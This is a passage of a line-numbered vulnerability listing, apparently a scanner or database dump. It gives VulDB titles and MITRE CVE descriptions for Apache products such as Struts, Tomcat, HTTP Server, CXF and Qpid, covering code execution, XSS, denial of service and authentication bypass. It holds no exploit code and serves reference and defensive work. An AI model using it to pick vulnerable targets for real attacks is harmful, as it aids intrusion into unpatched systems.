14784| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
14785| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
14786| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
14787| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
14788| [34252] Apache HTTP Server denial of service
14789| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
14790| [33877] Apache Opentaps 0.9.3 cross site scripting
14791| [33876] Apache Open For Business Project unknown vulnerability
14792| [33875] Apache Open For Business Project cross site scripting
14793| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
14794| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
14795|
14796| MITRE CVE - https://cve.mitre.org:
14797| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
14798| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
14799| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
14800| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
14801| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
14802| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
14803| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
14804| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
14805| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
14806| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
14807| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
14808| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
14809| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
14810| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
14811| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
14812| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
14813| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
14814| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
14815| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
14816| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
14817| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
14818| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
14819| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
14820| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
14821| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
14822| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
14823| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
14824| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
14825| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
14826| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
14827| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
14828| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
14829| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
14830| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
14831| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
14832| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
14833| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
14834| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
14835| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
14836| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
14837| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
14838| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
14839| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
14840| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
14841| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
14842| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
14843| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
14844| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
14845| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
14846| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
14847| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
14848| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
14849| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
14850| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
14851| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
14852| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
14853| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
14854| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
14855| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
14856| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
14857| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
14858| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
14859| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
14860| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
14861| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
14862| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
14863| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
14864| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
14865| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
14866| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
14867| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
14868| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
14869| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
14870| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
14871| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
14872| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
14873| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
14874| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
14875| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
14876| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
14877| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
14878| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
14879| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
14880| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
14881| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
14882| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
14883| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
14884| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
14885| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
14886| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
14887| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
14888| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
14889| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
14890| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
14891| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
14892| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
14893| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
14894| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
14895| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
14896| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
14897| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
14898| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
14899| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
14900| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
14901| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
14902| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
14903| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
14904| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
14905| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
14906| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
14907| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
14908| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
14909| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
14910| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
14911| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
14912| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
14913| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
14914| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
14915| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
14916| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
14917| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
14918| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
